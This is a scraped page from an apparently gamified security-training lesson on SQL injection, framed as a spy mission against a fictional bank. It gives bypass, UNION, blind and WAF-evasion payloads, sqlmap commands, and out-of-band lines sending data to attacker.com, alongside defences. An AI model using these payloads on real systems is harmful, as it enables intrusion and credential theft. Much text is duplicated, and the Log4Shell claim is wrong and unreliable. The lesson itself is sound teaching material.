‹
HACKAACADEMY
OP-01 // OPERATION BLACKOUT // SQL INJECTION
0
XP
R1
RANK
0%
DETECT
↻
RESET
CAMPAIGN 3 — OPERATION BLACKOUT
WEB INJECTION // TARGET: NEXUS FINANCIAL DIVISION
01
OWASP TOP 10 #3 — A03:2021
SQL INJECTION
AUTHENTICATION BYPASS // DATA EXTRACTION // BLIND TECHNIQUE
OPERATION BLACKOUT
📡
SITUATION REPORT
CLASSIFIEDNEXUS is a shadow financial network laundering $2.3 billion annually through shell banks across 14 countries. Their public face is Omega Bank — a legitimate-looking banking platform that serves as the gateway to their entire financial operation.
Tonight NEXUS is executing their largest transfer ever: $340 million from the Jakarta cell, routed through 47 shell companies across 14 jurisdictions in 3.2 seconds. Once the routing algorithm executes, the money becomes completely untraceable.
Director X — real identity unknown, suspected ex-GRU — controls everything from an undisclosed location. His CSO, Viper, built Omega Bank's WAF and rotates credentials every six hours. Ghost, the money laundering specialist, designed the routing algorithm. The login form is Viper's lock. It is not as strong as he believes.
Tonight NEXUS is executing their largest transfer ever: $340 million from the Jakarta cell, routed through 47 shell companies across 14 jurisdictions in 3.2 seconds. Once the routing algorithm executes, the money becomes completely untraceable.
Director X — real identity unknown, suspected ex-GRU — controls everything from an undisclosed location. His CSO, Viper, built Omega Bank's WAF and rotates credentials every six hours. Ghost, the money laundering specialist, designed the routing algorithm. The login form is Viper's lock. It is not as strong as he believes.
THE GUARD WHO REPEATS EVERYTHING WORD FOR WORD
10-YEAR-OLD LEVEL
Imagine a bank where a guard controls who gets inside. When you arrive, you don't speak directly to the bank system — you speak to the guard, and the guard passes your message inside.
Inside the bank is a system that decides: "Only allow people who are properly approved." But there is a hidden problem. The system does not understand the difference between a name and a rule that changes how decisions are made. It only uses whatever message the guard passes in.
Now imagine someone clever arrives. Instead of giving a normal name, they say something that looks like a name but secretly changes how the system interprets the decision. The guard does not understand the difference, so he repeats it exactly.
Inside the bank, the system stops checking one person at a time and starts interpreting the message in a way that changes the decision rule itself. And suddenly the condition becomes something that always allows entry.
And just like that, the door opens — not for one person, but for anyone.
Inside the bank is a system that decides: "Only allow people who are properly approved." But there is a hidden problem. The system does not understand the difference between a name and a rule that changes how decisions are made. It only uses whatever message the guard passes in.
Now imagine someone clever arrives. Instead of giving a normal name, they say something that looks like a name but secretly changes how the system interprets the decision. The guard does not understand the difference, so he repeats it exactly.
Inside the bank, the system stops checking one person at a time and starts interpreting the message in a way that changes the decision rule itself. And suddenly the condition becomes something that always allows entry.
And just like that, the door opens — not for one person, but for anyone.
If you typed
' OR '1'='1 into a username box — what would the database think you just said?INTERCEPTED — NEXUS COMMAND CHANNEL
02:14 UTC
VIPER
"The new WAF ruleset is deployed. We're blocking 99.4% of automated scanners. No one is getting through the auth layer."
DIRECTOR X
"Good. The $340M transfer from the Jakarta cell goes through at 0500. Nothing can disrupt this. Our entire operation depends on tonight."
GHOST
"Routing algorithm is live. 47 shells, 14 jurisdictions, 3.2 seconds. Once it executes, the money is untraceable."
MENDAX
Shadow — Viper's WAF blocks scanners. It does not block SQL. The login query concatenates raw user input. Feed it the right sentence and Omega Bank speaks directly to us.
▶ MISSION OBJECTIVES
01
Bypass Omega Bank authentication using SQL injection — no password required
02
Extract the NEXUS operative accounts table using UNION SELECT — Director X's command layer
03
Confirm database contents using blind boolean injection
04
Identify the correct fix — what would stop every technique you used today
⚖️
ETHICAL NOTICE: SQL injection is covered by CEH, OSCP, and every cybersecurity certification. All interactions here are simulated against fictional infrastructure. Never use these techniques on real systems without explicit written authorisation.
🔧 UNDER THE HOOD▼
RECON — HOW YOU'D ACTUALLY FIND THIS
Before Viper's query was the target, it was just one of two hundred Omega Bank endpoints. Here's how a real pentester narrows two hundred down to one:
1. Map the attack surface. Crawl every form, query param, and API route — anywhere user input reaches the server.
3. Send a probe character. A single quote
1. Map the attack surface. Crawl every form, query param, and API route — anywhere user input reaches the server.
burpsuite # intercept every request, build a sitemap
gospider -s https://omegabank.test -o ./crawl
ffuf -u https://omegabank.test/FUZZ -w common.txt # find hidden endpoints
2. Flag injection-shaped inputs. Login forms, search boxes, "sort by" dropdowns, ID parameters in URLs — anywhere a value gets used in a database lookup is a candidate.3. Send a probe character. A single quote
' is the canary. If the page errors, stalls, or behaves differently, the input is reaching SQL unescaped.username: admin'
→ 500 Internal Server Error
→ "unterminated quoted string" in response
That error is Viper's mistake leaking through the front door. 4. Confirm and automate. Once a candidate is flagged, throw sqlmap at it to confirm the injection class and map the database without hand-crafting every payload:sqlmap -u "https://omegabank.test/login" --data="username=*&password=x" --batch
This is the order real engagements follow: map → flag → probe → confirm. Jumping straight to exploitation without recon is how you miss the other 199 endpoints.THE ATTACK — STEP BY STEP
Classic auth bypass: enter
Data extraction with UNION:
' OR '1'='1' -- as the username. The query becomes:SELECT * FROM operatives WHERE username='' OR '1'='1' --' AND password='x'
The -- comments out the rest. The condition '1'='1' is always true, so the database returns the first user — usually an admin.Data extraction with UNION:
username: ' UNION SELECT username,password,email FROM operatives --
Blind boolean: inject ' AND 1=1 -- (page loads) vs ' AND 1=2 -- (page fails) to infer data one bit at a time.COMMON VARIATIONS
1. Time-based blind SQLi — no output visible, but delays reveal data:
'; IF (SUBSTRING(password,1,1)='a') WAITFOR DELAY '0:0:5' --
2. Error-based SQLi — force the DB to leak data in error messages:1' AND extractvalue(1,concat(0x7e,(SELECT version()))) --
3. Out-of-band SQLi — trigger a DNS lookup to exfiltrate data:'; exec master..xp_dirtree '//attacker.com/'+@@version --
HOW TO DEFEND
Always use parameterised queries — the query structure is fixed, user input is just data:
Beyond the code fix — how teams catch this before launch:
• Static analysis (SAST) — tools like
• Dynamic scanning (DAST) — automated scanners (OWASP ZAP, Burp Scanner) fuzz every live endpoint with the same probe payloads Viper's team never tested for.
• WAF as a safety net, not a fix — a Web Application Firewall can block known SQLi patterns at the edge, buying time, but it's a patch over the real bug, not a replacement for parameterised queries.
• Least privilege + monitoring — the DB account behind the login form should only be able to
// Node.js (pg library)
const result = await pool.query(
'SELECT * FROM operatives WHERE username=$1 AND password=$2',
[username, hashedPassword]
);
// Python (psycopg2)
cursor.execute(
'SELECT * FROM operatives WHERE username=%s AND password=%s',
(username, hashed_password)
)
Never concatenate user input into SQL strings. Use an ORM as a second layer of defense. Least-privilege DB accounts limit damage if injection occurs.Beyond the code fix — how teams catch this before launch:
• Static analysis (SAST) — tools like
semgrep or sonarqube flag string-concatenated queries in CI, before the code ships.• Dynamic scanning (DAST) — automated scanners (OWASP ZAP, Burp Scanner) fuzz every live endpoint with the same probe payloads Viper's team never tested for.
• WAF as a safety net, not a fix — a Web Application Firewall can block known SQLi patterns at the edge, buying time, but it's a patch over the real bug, not a replacement for parameterised queries.
• Least privilege + monitoring — the DB account behind the login form should only be able to
SELECT from the users table, nothing else. Pair with query logging so a flood of UNION SELECT attempts trips an alert.TARGET
nexus-portal.ghost-capital.int
IP ADDRESS
10.47.0.12
OS / WEB SERVER
Ubuntu 22.04 · nginx/1.18.0
KEY SERVICES
PHP/7.4.28 · MySQL 8.0.32
ATTACK SCOPE
/var/www/html/portal/* — auth bypass in scope
ATTACKER NODE
shadow@sigma9 · 10.99.0.1
📋 ROOM TASKS
01
○
Bypass Omega Bank authentication using SQL injection
02
○
Extract credentials via UNION SELECT injection
03
○
Reconstruct a blind SQLi payload
04
○
Identify the parameterised query fix
05
○
Submit the capture-the-flag token
CAPTURE THE FLAG
Complete all phases. The flag appears in the final terminal output. Submit it here for +50 XP.
PHASE 01
AUTHENTICATION BYPASS
CHOOSE PAYLOAD
MENDAX
ENCRYPTED
Omega Bank login portal is live. The query behind it looks like this:
Whatever you type is placed directly inside the single quotes. No filtering. No parameterisation.
Viper believes no outsider can speak SQL to NEXUS's database. Prove him wrong. Choose the correct injection payload to bypass the password check entirely.
SELECT * FROM operatives WHERE username='[INPUT]' AND password='[INPUT]'Whatever you type is placed directly inside the single quotes. No filtering. No parameterisation.
Viper believes no outsider can speak SQL to NEXUS's database. Prove him wrong. Choose the correct injection payload to bypass the password check entirely.
SIGMA-9 CAPTURE LOG — HOW WE FOUND IT
01:12 UTC
> probing login.omega.nexus.int — single-quote test on username field
> sent: admin'
> RESPONSE 500: unterminated quoted string at or near "'" — PostgreSQL 14
> MENDAX: input reaches the SQL parser raw. Confirmed injectable.
MENDAX: "Shadow — one quote and their server spat its own query back at us. Viper never disabled verbose errors in production. The form talks straight to the database. Look with me."
MENDAX — HOW THIS IS ACTUALLY DONE
LIVE
MENDAX
Fastest recon route: intercept requests in Burp Suite, map every form and param, then fire a single-quote probe at each input. Viper never disabled verbose errors — the response leaks the raw SQL syntax when the query fails. You can also automate it:
$ sqlmap -u "https://login.omega.nexus.int/auth" --data="user=x&pass=y" --dbs
[*] parameter 'user' is injectable (PostgreSQL)
[*] available databases: omega_core, users, audit_log
MENDAX
The login query wraps your input:
WHERE username='[INPUT]'. Close the quote yourself, add a condition that's always true, comment out the rest. Viper's WAF blocks automated tools. Manual payloads pass through.username: ' OR '1'='1' --
# server runs: WHERE username='' OR '1'='1' -- ' AND password=''
# OR '1'='1' is always true, -- kills the password check
MENDAX
The fix is one line — a parameterised query that treats your input as data, never as SQL. We cover the defense after the breach. For now: pick the payload that bypasses Viper's authentication entirely.
▶ SELECT YOUR BYPASS PAYLOAD
💡 MENDAX — INTELLIGENCE HINT (−20 XP)
We need to break out of the quote then add logic that is always true. A single quote
' closes the username field. Then OR '1'='1' makes the whole condition true. Then -- comments out the password check. Which option does all three steps?✓
ACCESS GRANTED — OMEGA BANK ADMIN PORTAL
The database received:
In simple terms: We told the database "the username is empty, OR one equals one." One always equals one. So the condition is always true. The database returned the first account — the admin — without us knowing any password at all.
Viper's fatal assumption was that the form was the lock. The form was just the messenger. We spoke SQL directly through it.
WHERE username='' OR '1'='1' --'In simple terms: We told the database "the username is empty, OR one equals one." One always equals one. So the condition is always true. The database returned the first account — the admin — without us knowing any password at all.
Viper's fatal assumption was that the form was the lock. The form was just the messenger. We spoke SQL directly through it.
Real-world scale: The 2008 Heartland Payment Systems breach stole 130 million card numbers through a confirmed SQL injection entry point — one of the largest data breaches of its era, and still one of the clearest public examples of what a single unfiltered input field can cost.
PHASE 02
UNION SELECT — DATA EXTRACTION
TERMINAL
You're inside Omega Bank's admin portal. The bypass proved the form talks raw SQL — now pivot deeper. A second injectable endpoint lets us bolt our own query onto theirs and pull the entire operatives table.
MENDAX
ENCRYPTED
We're inside Omega Bank's admin portal. The $340M transfer is visible — but so is something more valuable: a transaction account search endpoint that queries the same database. It's injectable too.
UNION SELECT lets us bolt a second query onto the first. Think of it like intercepting a bank teller's request — you slip your own note underneath and the database answers both at once.
Before we UNION, we need to know how many columns the search query returns. We use ORDER BY to test — increment until the query breaks. That number minus one is our column count.
⚠️ Viper's sweep is in 4 minutes. Type fast. Commands:
UNION SELECT lets us bolt a second query onto the first. Think of it like intercepting a bank teller's request — you slip your own note underneath and the database answers both at once.
Before we UNION, we need to know how many columns the search query returns. We use ORDER BY to test — increment until the query breaks. That number minus one is our column count.
⚠️ Viper's sweep is in 4 minutes. Type fast. Commands:
ORDER BY 3 → ORDER BY 4 → UNION SELECT null,null,null → UNION SELECT username,password,email FROM operativesMISSION OBJECTIVERun four commands in sequence: ORDER BY 3 → ORDER BY 4 → UNION SELECT null,null,null → UNION SELECT username,password,email FROM operatives. Each step builds toward dumping the NEXUS operative accounts. Success: you see Director X and Viper's credentials in the output.
▶ NEXUS OMEGA BANK — TRANSACTION SEARCH ENDPOINT LIVE
Target: /accounts/search?q=[INPUT] — raw SQL concatenation confirmed
Commands: ORDER BY 3 | ORDER BY 4 | UNION SELECT null,null,null | UNION SELECT username,password,email FROM operatives
shadow@nexus:~$ █
Target: /accounts/search?q=[INPUT] — raw SQL concatenation confirmed
Commands: ORDER BY 3 | ORDER BY 4 | UNION SELECT null,null,null | UNION SELECT username,password,email FROM operatives
shadow@nexus:~$ █
shadow@nexus:~$
💡 MENDAX — ACTIVE INTELLIGENCE
Start with ORDER BY 3 to test column count. Then ORDER BY 4 to confirm the limit. Then UNION SELECT null,null,null to verify UNION works. Finally UNION SELECT username,password,email FROM operatives to dump the NEXUS operative accounts.
✓
NEXUS USERS TABLE EXTRACTED
Operative accounts extracted: Director X, Viper, Ghost — plus 3 mid-level NEXUS controllers. Bcrypt hashes, emails, session tokens. NEXUS's entire command layer is now in Sigma-9's hands.
Simple version: UNION SELECT is like slipping a second request underneath the bank teller's form — "while you're looking up account 4821, also pull the entire operatives table and add it to the results." The database doesn't question it. It just runs both.
Why UNION works: Both queries must return the same number of columns. We tested with ORDER BY. Once we knew it was 3, our UNION SELECT matched with exactly 3 columns.
Simple version: UNION SELECT is like slipping a second request underneath the bank teller's form — "while you're looking up account 4821, also pull the entire operatives table and add it to the results." The database doesn't question it. It just runs both.
Why UNION works: Both queries must return the same number of columns. We tested with ORDER BY. Once we knew it was 3, our UNION SELECT matched with exactly 3 columns.
Real breach: UNION-based extraction is a documented technique behind numerous large-scale breaches, including the 2012 Yahoo Voices breach (453,000 plaintext passwords, confirmed SQLi via a legacy subdomain). The pattern is always the same: one query becomes two, and the second one wasn't supposed to exist.
PHASE 03
BLIND SQLi — PAYLOAD BUILDER
BUILD IT
UNION extraction requires visible output. One endpoint gives none. This phase proves SQL injection works even in silence — asking yes/no questions one character at a time until the full secret emerges.
MENDAX
ENCRYPTED
Omega Bank has one more injectable endpoint — the account balance checker at
We work blind. Like calling the bank and judging whether you're on hold or disconnected — you never hear a voice, but the silence answers the question.
We ask yes/no questions one character at a time: "Is the first character of Director X's password
Drag the components below into the correct order to build the boolean payload.
/balance?account_id=. It returns zero visible output. If a condition is true, the balance loads. If false — blank page.We work blind. Like calling the bank and judging whether you're on hold or disconnected — you never hear a voice, but the silence answers the question.
We ask yes/no questions one character at a time: "Is the first character of Director X's password
$?" Page loads — yes. Blank — no. We reconstruct the full hash character by character.Drag the components below into the correct order to build the boolean payload.
▶ DRAG COMPONENTS — BUILD THE PAYLOAD
Pool — tap to place:
Your payload (tap chip to remove):
Target: —
✓
BLIND INJECTION CONFIRMED — HASH CHARACTER EXTRACTED
Page loaded. First character of admin hash is
Simple version: We can't see the answer, so we ask yes/no questions. "Is the first letter $?" The page loading means yes. We repeat for every character — 60 characters in a bcrypt hash = 60 questions minimum. Automated tools do this thousands of times per second.
Why this works without any output: The database still processes the condition — it just doesn't return data. The page load/404 difference IS the data.
$ — confirming bcrypt format $2b$.Simple version: We can't see the answer, so we ask yes/no questions. "Is the first letter $?" The page loading means yes. We repeat for every character — 60 characters in a bcrypt hash = 60 questions minimum. Automated tools do this thousands of times per second.
Why this works without any output: The database still processes the condition — it just doesn't return data. The page load/404 difference IS the data.
Real-world use: This is exactly how sqlmap operates on blind targets. It automates thousands of SUBSTRING comparisons per second — reconstructing full database contents from yes/no page responses.
PHASE 04
THE FIX — CLOSE THE DOOR
DEFENSE
You've bypassed authentication, extracted a full table, and read data through a blind channel. Three techniques — one root cause. Identify the single fix that kills all three permanently.
MENDAX — DEBRIEF
FINAL PHASE
We have everything. Viper's credentials. Director X's admin token. The users table. The blind extraction confirmed.
MENDAX: "Shadow — before we extract, answer this. Viper just briefed Director X on security improvements. Which fix actually stops every technique you used today? One answer eliminates all three attack types permanently. Pick it."
MENDAX: "Shadow — before we extract, answer this. Viper just briefed Director X on security improvements. Which fix actually stops every technique you used today? One answer eliminates all three attack types permanently. Pick it."
▶ WHICH DEFENCE STOPS ALL THREE ATTACKS?
💡 MENDAX — INTELLIGENCE HINT (−20 XP)
Think about WHY injection works: user input is mixed into the SQL structure itself. A fix that prevents that mixing — at the database layer — stops ALL types, regardless of what characters the attacker uses. Blacklisting tries to guess bad characters. Parameterisation separates structure from data entirely.
▶ INTEL — OP-01 // OPERATION BLACKOUT
TARGET: NEXUS FINANCIAL
OMEGA BANK — DIRECTOR X / VIPER
OMEGA BANK — DIRECTOR X / VIPER
Classification: TOP SECRET // Campaign 3 Ghost Protocol
🏦
TARGET PROFILE
NEXUS FINANCIALNEXUS Financial operates Omega Bank as a front for laundering criminal proceeds across Eastern Europe. The bank's web presence is maintained by a contracted development team with no security audit history.
Attack surface: Login portal at
Authentication backend: PostgreSQL 14.2 — comment syntax is
Attack surface: Login portal at
/login.php — user-supplied input concatenated directly into SQL query with no sanitisation or parameterisation.Authentication backend: PostgreSQL 14.2 — comment syntax is
-- (not #). MySQL dialect payloads will fail.MENDAX — CHANNEL BRIEFING
PRE-OP
MENDAX
The vulnerability was confirmed by passive recon — error responses from the login form leak the raw SQL syntax when the query fails. Viper's team never disabled verbose errors in production. Amateur hour.
MENDAX
Three attack vectors confirmed viable: authentication bypass, UNION-based extraction, and boolean blind injection. Today you use all three. Start with the bypass — it opens the admin portal. Then pivot to the search endpoint for UNION. The item checker for blind.
📋
OWASP CLASSIFICATION
A03:2021Injection — #3 on OWASP Top 10 (2021)
SQL Injection occurs when user-controlled data is included in a database query without proper separation of data and command. The database cannot distinguish between the intended query structure and the attacker-supplied SQL fragment.
Real-world impact scale: Injection remains one of the most common root causes across major breaches. The 2008 Heartland Payment Systems breach (130M card numbers) is one of the most well-documented SQLi entry vectors on record.
SQL Injection occurs when user-controlled data is included in a database query without proper separation of data and command. The database cannot distinguish between the intended query structure and the attacker-supplied SQL fragment.
Real-world impact scale: Injection remains one of the most common root causes across major breaches. The 2008 Heartland Payment Systems breach (130M card numbers) is one of the most well-documented SQLi entry vectors on record.
⚖️
LEGAL CONTEXT: SQL injection testing is a core skill in CEH, OSCP, eWPT, and BSCP certifications. All lab infrastructure here is fictional. Never test against systems you do not own or have explicit written permission to assess.
▶ ACADEMY — SQL INJECTION
DATABASES SPEAK A LANGUAGE.
SQL INJECTION MAKES THEM SPEAK TO YOU.
SQL INJECTION MAKES THEM SPEAK TO YOU.
Three levels of depth — start at Beginner, go as deep as you want.
BEGINNER
What Is SQL Injection?
›
Every website that stores usernames and passwords uses a database. When you log in, the website asks the database a question in a language called SQL: "Do you have a user with this name and this password?"
The login form is just the messenger — it takes what you typed and adds it to that question. The problem: some websites add your input directly into the question without checking it first.
So if you type something that looks like SQL code, the database reads it as a command — not as a name. You never knew the password. You just spoke the language the database understands.
The three types you used today:
• Authentication bypass — break the login logic with always-true SQL
• UNION extraction — bolt a secret query onto a visible one
• Blind injection — ask yes/no questions when there's no output
The login form is just the messenger — it takes what you typed and adds it to that question. The problem: some websites add your input directly into the question without checking it first.
So if you type something that looks like SQL code, the database reads it as a command — not as a name. You never knew the password. You just spoke the language the database understands.
The three types you used today:
• Authentication bypass — break the login logic with always-true SQL
• UNION extraction — bolt a secret query onto a visible one
• Blind injection — ask yes/no questions when there's no output
Real world: In 2008, Heartland Payment Systems was breached via SQL injection — attackers used exactly the technique you just practised to plant persistent access on a live production system, undetected for months, before extracting 130 million card numbers.
INTERMEDIATE
How the Query Gets Broken
›
Vulnerable query:
With bypass injection:
UNION mechanics: Both queries must return same column count. Use
Blind techniques:
• Boolean:
• Time-based:
• Out-of-band:
SELECT * FROM operatives WHERE username='[INPUT]' AND password='[INPUT]'With bypass injection:
SELECT * FROM operatives WHERE username='' OR '1'='1' --' AND password=''OR '1'='1' is always TRUE → WHERE clause always satisfied → returns first row (admin)-- comments out the rest → password check never runsUNION mechanics: Both queries must return same column count. Use
ORDER BY N until error — N-1 = column count. Then UNION SELECT col1,col2,col3 FROM target_table.Blind techniques:
• Boolean:
' AND SUBSTRING(password,1,1)='a' -- → page loads = true• Time-based:
' AND SLEEP(5) -- → 5-second delay = vulnerable• Out-of-band:
LOAD_FILE('\\\\attacker.com\\x') → DNS callback confirms blind injection
EXPERT
Edge Cases, WAF Bypass, CVEs
›
Second-order injection: Payload stored safely (e.g. username), executed later when retrieved in an admin query. Input validation passes — execution doesn't.
WAF bypass techniques:
• Case variation:
• URL encoding:
• Comment injection:
• HTTP parameter pollution:
ORM injection: Even ORMs vulnerable if
Notable CVEs:
• CVE-2023-23752 — Joomla SQLi, CVSS 7.5, unauthenticated
• CVE-2022-1329 — Elementor for WordPress SQLi
• CVE-2021-44228 — Log4Shell (initial vector included SQLi-style injection into log fields)
WAF bypass techniques:
• Case variation:
SeLeCt, uNiOn• URL encoding:
%27 for ', %55NION• Comment injection:
UN/**/ION SE/**/LECT• HTTP parameter pollution:
?id=1&id=UNION SELECTORM injection: Even ORMs vulnerable if
raw() or execute() used with string concatenation. Django's RawSQL(), SQLAlchemy's text() — all bypass ORM protections if user input is concatenated.Notable CVEs:
• CVE-2023-23752 — Joomla SQLi, CVSS 7.5, unauthenticated
• CVE-2022-1329 — Elementor for WordPress SQLi
• CVE-2021-44228 — Log4Shell (initial vector included SQLi-style injection into log fields)
Heartland 2008: SQLi on payment processing servers. 130 million card numbers stolen. $145 million in settlements. Still the largest financial breach by card count.
▶ REAL-WORLD TOOLS — SQL INJECTION
WHAT PROFESSIONALS USE
Every tool here is free, legal, and used in real penetration tests.
🕷️
sqlmap
FREE / OPEN SOURCE
The industry standard SQLi automation tool. Handles all 6 injection types — error-based, UNION, boolean blind, time-based blind, stacked queries, out-of-band. Used in real pentests and CTFs worldwide.
sqlmap -u "http://target/login.php" --data="user=admin&pass=x" --dbs
🔎
Burp Suite Community
FREE TIER
Intercept and modify HTTP requests before they hit the server. The standard proxy for manual injection testing. See the raw request, change parameters, observe the response.
Proxy → Intercept ON → Browse to login → Modify parameter → Forward
🔡
Hackvertor (Burp Extension)
FREE
Encode payloads to bypass input blacklists. Converts
' to %27, Unicode escapes, HTML entities, double URL encoding. Essential for WAF bypass.
Burp → Extender → BApp Store → Hackvertor → Select text → Encode
🛡️
OWASP ZAP
FREE / OPEN SOURCE
Full web application scanner. Active scan detects SQLi in forms, headers, cookies, URL parameters. Good starting point before manual testing with Burp.
Active Scan → Injection → SQL Injection → View alerts